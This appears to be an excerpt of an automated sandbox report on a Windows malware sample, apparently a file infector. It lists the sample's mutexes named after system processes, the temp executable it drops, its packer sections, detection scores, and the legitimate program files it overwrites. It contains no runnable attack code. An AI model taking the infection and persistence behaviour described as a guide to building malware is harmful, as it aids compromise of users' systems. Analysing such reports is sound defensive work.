        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5680_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1680_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1220_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1052_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_7412_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1408_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_7068_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_4632_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1028_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_584_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1968_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\wmiadap.exeM_5952_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_640_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3296_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1124_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1584_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2936_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_1172_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6444_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2300_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_7032_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6432_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6880_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_784_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4472_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4852_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_592_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\memory compressionM_1568_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5820_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_6052_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\officeclicktorun.exeM_2648_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5072_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1452_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\#u6587#u4ef6#u7279#u5f81#u6458#u8981#u5217#u8868#u751f#u6210.exeM_7248_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2608_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2432_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1248_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_7296_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\cscript.exeM_5220_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5964_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_5976_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\dashost.exeM_4228_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_5504_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_880_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3032_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMutant created: \Sessions\1\BaseNamedObjects\ibeuodtjakpfnfcsv.exeM_2716_
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; File created: C:\Users\user\AppData\Local\Temp\YMZwp.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; File read: C:\Windows\system.ini
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: svchost.exe, 00000019.00000000.1454353956.000001F0FBA9F000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE [WNSPushChannel]( [ChannelId] TEXT NOT NULL, [HandlerId] INTEGER REFERENCES[NotificationHandler]([RecordId]) ON DELETE CASCADE ON UPDATE CASCADE, [Uri] TEXT, [ExpiryTime] INT64, [CreatedTime] INT64, [DeviceVersion] INT64 DEFAULT '0', CONSTRAINT[] PRIMARY KEY([ChannelId]) ON CONFLICT REPLACE);
        Source: svchost.exe, 00000017.00000000.1451423059.000001697C109000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SELECT [Id], [AssetPayload], [Status], [LastRefreshTime] FROM [Asset] WHERE [Status]=?;
        Source: svchost.exe, 00000017.00000000.1451662239.000001697C19A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1451423059.000001697C12C000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: INSERT INTO [Activity] ([Id], [AppId], [PackageIdHash], [AppActivityId], [ActivityType], [ActivityStatus], [ParentActivityId], [Tag], [Group], [MatchId], [LastModifiedTime], [ExpirationTime], [Payload], [Priority], [IsLocalOnly], [PlatformDeviceId], [CreatedInCloud], [StartTime], [EndTime], [LastModifiedOnClient], [GroupAppActivityId], [ClipboardPayload], [EnterpriseId], [UserActionState], [IsRead], [GroupItems], [DdsDeviceId], [LocalExpirationTime], [ETag]) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,(SELECT [Value] FROM [ManualSequence] WHERE [Key] = 'Activity'));
        Source: svchost.exe, 00000017.00000000.1451662239.000001697C19A000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: INSERT INTO [Activity_PackageId] ([ActivityId], [Platform], [PackageName], [ExpirationTime]) VALUES (?,?,?,?);
        Source: svchost.exe, 00000017.00000000.1451423059.000001697C112000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: UPDATE [ManualSequence] SET [Value] = [Value] + 1 WHERE [Key] = 'Activity';
        Source: svchost.exe, 00000017.00000000.1451423059.000001697C12C000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE [Activity_PackageId]([ActivityId] GUID NOT NULL, [Platform] TEXT NOT NULL COLLATE NOCASE, [PackageName] TEXT NOT NULL COLLATE NOCASE, [ExpirationTime] DATETIME NOT NULL);
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; ReversingLabs: Detection: 97%
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; Virustotal: Detection: 89%
        Source: unknown; Process created: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe "C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe"
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; Process created: C:\Users\user\AppData\Local\Temp\YMZwp.exe C:\Users\user\AppData\Local\Temp\YMZwp.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; Process created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe; Process created: C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 1624
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess created: C:\Users\user\AppData\Local\Temp\YMZwp.exe C:\Users\user\AppData\Local\Temp\YMZwp.exeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Section loaded: urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, uxtheme.dll, wininet.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, ntvdm64.dll, version.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll
        Source: C:\Windows\System32\dllhost.exe Section loaded: kernel.appcore.dll, uxtheme.dll, wininet.dll, windows.storage.dll, wldp.dll, profapi.dll, iertutil.dll, esent.dll, cryptbase.dll, powrprof.dll, umpdc.dll, userenv.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Section loaded: dxgi.dll, wincorlib.dll, kernel.appcore.dll, windows.ui.xaml.dll, coremessaging.dll, bcp47langs.dll, iertutil.dll, dcomp.dll, twinapi.appcore.dll, wintypes.dll, windows.staterepositorycore.dll, onecoreuapcommonproxystub.dll, windows.ui.dll, windowmanagementapi.dll, textinputframework.dll, inputhost.dll, coreuicomponents.dll, propsys.dll, ntmarta.dll, uxtheme.dll, urlmon.dll, srvcli.dll, netutils.dll, resourcepolicyclient.dll, d3d11.dll, quickactionsdatamodel.dll, d3d10warp.dll, dxcore.dll, d2d1.dll, mrmcorer.dll, windows.storage.applicationdata.dll, windows.staterepositoryclient.dll, windows.storage.dll, wldp.dll, dwrite.dll, profapi.dll, languageoverlayutil.dll, bcp47mrm.dll, textshaping.dll, windows.shell.servicehostbuilder.dll, execmodelproxy.dll, rmclient.dll, uiamanager.dll, windows.ui.core.textinput.dll, windows.ui.immersive.dll, dataexchange.dll, cryptbase.dll, windows.globalization.dll, windows.globalization.fontgroups.dll, fontgroupsoverride.dll, directmanipulation.dll, notificationcontrollerps.dll, powrprof.dll, umpdc.dll, windows.ui.xaml.controls.dll, windows.applicationmodel.dll, windows.graphics.dll, audioses.dll, mmdevapi.dll, devobj.dll, usermgrproxy.dll, avrt.dll, userenv.dll, sspicli.dll, windows.staterepositoryps.dll, windows.web.dll, logoncli.dll, windowscodecs.dll, threadpoolwinrt.dll, dwmapi.dll
        Source: C:\Windows\System32\RuntimeBroker.exe Section loaded: powrprof.dll, kernel.appcore.dll, rmclient.dll, umpdc.dll, windows.storage.dll, wldp.dll, uxtheme.dll, onecoreuapcommonproxystub.dll, structuredquery.dll, propsys.dll, windows.staterepositoryps.dll, wintypes.dll, windows.storage.search.dll, edputil.dll, windows.staterepositorycore.dll
        Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll, vcruntime140.dll, msvcp140.dll
        Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\RuntimeBroker.exe Section loaded: dxcore.dll, iertutil.dll
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4657278A-411B-11d2-839A-00C04FD918D0}\InProcServer32
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File written: C:\Windows\system.ini
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Static file information: File size 1233920 > 1048576
        Source: Binary string: D:\a\_work\e\src\out\Release_x64\initialexe\msedge.exe.pdb source: msedge.exe.6.dr
        Source: Binary string: y.pdb source: SearchApp.exe, 0000001F.00000000.1605415996.000001D62E0C2000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\e\src\out\Release_x64\initialexe\msedge.exe.pdbOGP source: msedge.exe.6.dr

        Data Obfuscation

        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Unpacked PE file: 9.2.YMZwp.exe.b30000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0042B220 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,LoadTypeLib,LoadTypeLib,RegisterTypeLib,UnRegisterTypeLib,6_2_0042B220
        Source: initial sample Static PE information: section where entry point is pointing to: cu
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Static PE information: section name: cu
        Source: YMZwp.exe.6.dr Static PE information: section name: .aspack
        Source: YMZwp.exe.6.dr Static PE information: section name: .adata
        Source: msedge.exe.6.dr Static PE information: section name: .00cfg
        Source: msedge.exe.6.dr Static PE information: section name: .gxfg
        Source: msedge.exe.6.dr Static PE information: section name: .retplne
        Source: msedge.exe.6.dr Static PE information: section name: CPADinfo
        Source: msedge.exe.6.dr Static PE information: section name: LZMADEC
        Source: msedge.exe.6.dr Static PE information: section name: _RDATA
        Source: msedge.exe.6.dr Static PE information: section name: malloc_h
        Source: MyProg.exe.9.dr Static PE information: section name: PELIB
        Source: MyProg.exe.9.dr Static PE information: section name: Y|uR
        Source: SciTE.exe.9.dr Static PE information: section name: u
        Source: Uninstall.exe.9.dr Static PE information: section name: EpNuZ
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004AB680 push eax; ret 6_2_004AB6AE
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004ADD18 push eax; ret 6_2_004ADD36
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_02433600 push eax; ret 6_2_0243362E
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0242072E push eax; iretd 6_2_0242072F
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Code function: 9_2_00B31638 push dword ptr [00B33084h]; ret 9_2_00B3170E
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Code function: 9_2_00B36014 push 00B314E1h; ret 9_2_00B36425
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Code function: 9_2_00B32D9B push ecx; ret 9_2_00B32DAB
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Code function: 9_2_00B3600A push ebp; ret 9_2_00B3600D
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Static PE information: section name: .rsrc entropy: 7.708524676179253
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Static PE information: section name: cu entropy: 7.774178931521131
        Source: lwkdr.exe.6.dr Static PE information: section name: .text entropy: 7.989262346851243
        Source: YMZwp.exe.6.dr Static PE information: section name: .text entropy: 7.81169422100848
        Source: winxmkqo.exe.6.dr Static PE information: section name: .text entropy: 7.989262346851243
        Source: MyProg.exe.9.dr Static PE information: section name: Y|uR entropy: 6.9349017570106675
        Source: SciTE.exe.9.dr Static PE information: section name: u entropy: 6.934592345984145
        Source: Uninstall.exe.9.dr Static PE information: section name: EpNuZ entropy: 6.934553645927102
        Source: initial sample Static PE information: section name: UPX0
        Source: initial sample Static PE information: section name: UPX1

        Persistence and Installation Behavior

        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File created: C:\Program Files\7-Zip\Uninstall.exe
